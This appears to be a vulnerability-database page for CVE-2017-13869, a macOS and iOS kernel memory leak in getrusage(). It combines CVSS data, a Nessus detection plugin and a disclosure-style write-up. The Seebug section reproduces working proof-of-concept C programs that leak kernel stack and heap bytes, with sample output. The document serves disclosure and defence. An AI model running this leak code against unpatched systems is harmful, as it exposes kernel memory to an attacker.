Vulnerabilities > CVE-2017-13869 - Information Exposure vulnerability in Apple products
Attack vector
LOCAL Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
NONE Availability impact
NONE Summary
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Subverting Environment Variable Values The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
- Footprinting An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
- Exploiting Trust in Client (aka Make the Client Invisible) An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
- Browser Fingerprinting An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
- Session Credential Falsification through Prediction This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Exploit-Db
| description | macOS - 'getrusage' Stack Leak Through struct Padding. CVE-2017-13869. Dos exploit for macOS platform |
| file | exploits/macos/dos/43319.c |
| id | EDB-ID:43319 |
| last seen | 2017-12-11 |
| modified | 2017-12-11 |
| platform | macos |
| port | |
| published | 2017-12-11 |
| reporter | Exploit-DB |
| source | https://www.exploit-db.com/download/43319/ |
| title | macOS - 'getrusage' Stack Leak Through struct Padding |
| type | dos |
Nessus
NASL family MacOS X Local Security Checks NASL id MACOS_10_13_2.NASL description The remote host is running a version of Mac OS X that is 10.13.x prior to 10.13.2. It is, therefore, affected by multiple vulnerabilities in the following components : - apache - curl - Directory Utility - IOAcceleratorFamily - IOKit - Intel Graphics Driver - Kernel - Mail - Mail Drafts - OpenSSL - Screen Sharing Server Note that successful exploitation of the most serious issues can result in arbitrary code execution. last seen 2020-06-01 modified 2020-06-02 plugin id 105080 published 2017-12-07 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105080 title macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(105080); script_version("1.12"); script_cvs_date("Date: 2019/06/19 15:17:43"); script_cve_id( "CVE-2017-1000254", "CVE-2017-13847", "CVE-2017-13848", "CVE-2017-13855", "CVE-2017-13858", "CVE-2017-13860", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13871", "CVE-2017-13872", "CVE-2017-13875", "CVE-2017-13876", "CVE-2017-13878", "CVE-2017-13883", "CVE-2017-13886", "CVE-2017-13887", "CVE-2017-13892", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-3735", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7154", "CVE-2017-7155", "CVE-2017-7158", "CVE-2017-7159", "CVE-2017-7162", "CVE-2017-7163", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173", "CVE-2017-9798" ); script_bugtraq_id( 100515, 100872, 101115, 101981, 102097, 102098, 102099, 102100, 102378, 103134, 103135 ); script_xref(name:"IAVA", value:"2018-A-0019"); script_name(english:"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)"); script_summary(english:"Checks the version of Mac OS X / macOS."); script_set_attribute(attribute:"synopsis", value: "The remote host is missing a macOS update that fixes multiple security vulnerabilities."); script_set_attribute(attribute:"description", value: "The remote host is running a version of Mac OS X that is 10.13.x prior to 10.13.2. It is, therefore, affected by multiple vulnerabilities in the following components : - apache - curl - Directory Utility - IOAcceleratorFamily - IOKit - Intel Graphics Driver - Kernel - Mail - Mail Drafts - OpenSSL - Screen Sharing Server Note that successful exploitation of the most serious issues can result in arbitrary code execution."); script_set_attribute(attribute:"see_also", value:"https://support.apple.com/en-us/HT208331"); script_set_attribute(attribute:"see_also", value:"https://support.apple.com/en-us/HT208394"); script_set_attribute(attribute:"solution", value: "Upgrade to macOS version 10.13.2 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-7172"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Mac OS X Root Privilege Escalation'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/06"); script_set_attribute(attribute:"patch_publication_date", value:"2017/12/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/12/07"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:mac_os_x"); script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:macos"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"MacOS X Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl", "os_fingerprint.nasl"); script_require_ports("Host/MacOSX/Version", "Host/OS"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); os = get_kb_item("Host/MacOSX/Version"); if (!os) { os = get_kb_item_or_exit("Host/OS"); if ("Mac OS X" >!< os) audit(AUDIT_OS_NOT, "macOS / Mac OS X"); c = get_kb_item("Host/OS/Confidence"); if (c <= 70) exit(1, "Can't determine the host's OS with sufficient confidence."); } if (!os) audit(AUDIT_OS_NOT, "macOS / Mac OS X"); matches = pregmatch(pattern:"Mac OS X ([0-9]+(\.[0-9]+)+)", string:os); if (empty_or_null(matches)) exit(1, "Failed to parse the macOS / Mac OS X version ('" + os + "')."); version = matches[1]; fixed_version = "10.13.2"; if (version !~"^10\.13($|[^0-9])") audit(AUDIT_OS_NOT, "macOS 10.13.x"); if (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1) { security_report_v4( port:0, severity:SECURITY_HOLE, extra: '\n Installed version : ' + version + '\n Fixed version : ' + fixed_version + '\n' ); } else audit(AUDIT_INST_VER_NOT_VULN, "macOS / Mac OS X", version);NASL family Misc. NASL id APPLETV_11_2.NASL description According to its banner, the version of Apple TV on the remote device is prior to 11.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208327 security advisory. Note that only 4th and 5th generation models are affected by these vulnerabilities. last seen 2020-06-01 modified 2020-06-02 plugin id 105612 published 2018-01-05 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105612 title Apple TV < 11.2 Multiple Vulnerabilities NASL family MacOS X Local Security Checks NASL id MACOSX_SECUPD2017-005.NASL description The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is missing a security update. It is therefore, affected by multiple vulnerabilities affecting the following components : - apache - curl - IOAcceleratorFamily - IOKit - Kernel - OpenSSL - Screen Sharing Server last seen 2020-06-01 modified 2020-06-02 plugin id 105081 published 2017-12-07 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105081 title macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)
Packetstorm
| data source | https://packetstormsecurity.com/files/download/145364/GS20171212052204.txt |
| id | PACKETSTORM:145364 |
| last seen | 2017-12-13 |
| published | 2017-12-12 |
| reporter | Google Security Research |
| source | https://packetstormsecurity.com/files/145364/macOS-getrusage-Stack-Leak.html |
| title | macOS getrusage Stack Leak |
Seebug
| bulletinFamily | exploit |
| description | For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace: ``` int getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval) { struct rusage *rup, rubuf; struct user64_rusage rubuf64; struct user32_rusage rubuf32; size_t retsize = sizeof(rubuf); /* default: 32 bits */ caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */ struct timeval utime; struct timeval stime; switch (uap->who) { case RUSAGE_SELF: calcru(p, &utime, &stime, NULL); proc_lock(p); rup = &p->p_stats->p_ru; rup->ru_utime = utime; rup->ru_stime = stime; rubuf = *rup; proc_unlock(p); break; [...] } if (IS_64BIT_PROCESS(p)) { retsize = sizeof(rubuf64); retbuf = (caddr_t)&rubuf64; munge_user64_rusage(&rubuf, &rubuf64); } else { [...] } return (copyout(retbuf, uap->rusage, retsize)); } ``` `munge_user64_rusage()` performs the conversion by copying individual fields: ``` __private_extern__ void munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p) { /* timeval changes size, so utime and stime need special handling */ a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec; a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec; a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec; a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec; [...] } ``` `struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element: ``` #define _STRUCT_USER64_TIMEVAL struct user64_timeval _STRUCT_USER64_TIMEVAL { user64_time_t tv_sec; /* seconds */ __int32_t tv_usec; /* and microseconds */ }; struct user64_rusage { struct user64_timeval ru_utime; /* user time used */ struct user64_timeval ru_stime; /* system time used */ user64_long_t ru_maxrss; /* max resident set size */ [...] }; ``` This padding is not initialized, but is copied to userspace. The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0. Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers. The returned data seems to come from the previous syscall: ``` $ cat test.c #include <sys/resource.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> void do_leak(void) { static struct rusage ru; getrusage(RUSAGE_SELF, &ru); static unsigned int leak1, leak2; memcpy(&leak1, ((char*)&ru)+12, 4); memcpy(&leak1, ((char*)&ru)+28, 4); printf("leak1: 0x%08x\n", leak1); printf("leak2: 0x%08x\n", leak2); } int main(void) { do_leak(); do_leak(); do_leak(); int fd = open("/dev/null", O_RDONLY); do_leak(); int dummy; read(fd, &dummy, 4); do_leak(); return 0; } ``` ``` $ gcc -o test test.c && ./test leak1: 0x00000000 leak2: 0x00000000 leak1: 0xffffff80 leak2: 0x00000000 leak1: 0xffffff80 leak2: 0x00000000 leak1: 0xffffff80 leak2: 0x00000000 leak1: 0xffffff81 leak2: 0x00000000 ``` However, I believe that this can also be used to disclose kernel heap memory. When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack without zeroing it, so the new stack contains data from previous heap allocations. The following testcase, when run after repeatedly reading a wordlist into memory, leaks some non-pointer data that seems to come from the wordlist: ``` $ cat forktest.c #include <sys/resource.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> void do_leak(void) { static struct rusage ru; getrusage(RUSAGE_SELF, &ru); static unsigned int leak1, leak2; memcpy(&leak1, ((char*)&ru)+12, 4); memcpy(&leak1, ((char*)&ru)+28, 4); char str[1000]; if (leak1 != 0) { sprintf(str, "leak1: 0x%08x\n", leak1); write(1, str, strlen(str)); } if (leak2 != 0) { sprintf(str, "leak2: 0x%08x\n", leak2); write(1, str, strlen(str)); } } void leak_in_child(void) { int res_pid, res2; asm volatile( "mov $0x02000002, %%rax\n\t" "syscall\n\t" : "=a"(res_pid), "=d"(res2) : : "cc", "memory", "rcx", "r11" ); //write(1, "postfork\n", 9); if (res2 == 1) { //write(1, "child\n", 6); do_leak(); char dummy; read(0, &dummy, 1); asm volatile( "mov $0x02000001, %rax\n\t" "mov $0, %rdi\n\t" "syscall\n\t" ); } //printf("fork=%d:%d\n", res_pid, res2); int wait_res; //wait(&wait_res); } int main(void) { for(int i=0; i<1000; i++) { leak_in_child(); } } ``` ``` $ gcc -o forktest forktest.c && ./forktest leak1: 0x1b3b1320 leak1: 0x00007f00 leak1: 0x65686375 leak1: 0x410a2d63 leak1: 0x8162ced5 leak1: 0x65736168 leak1: 0x0000042b ``` The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist. Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack. |
| id | SSV:96990 |
| last seen | 2017-12-25 |
| modified | 2017-12-15 |
| published | 2017-12-15 |
| reporter | Root |
| title | MacOS getrusage stack leak through struct padding(CVE-2017-13869) |
References
- https://support.apple.com/HT208334
- https://support.apple.com/HT208331
- https://support.apple.com/HT208327
- https://support.apple.com/HT208325
- https://www.exploit-db.com/exploits/43319/
- http://www.securitytracker.com/id/1039966
- http://www.securitytracker.com/id/1039953
- http://www.securitytracker.com/id/1039952
- http://www.securityfocus.com/bid/102100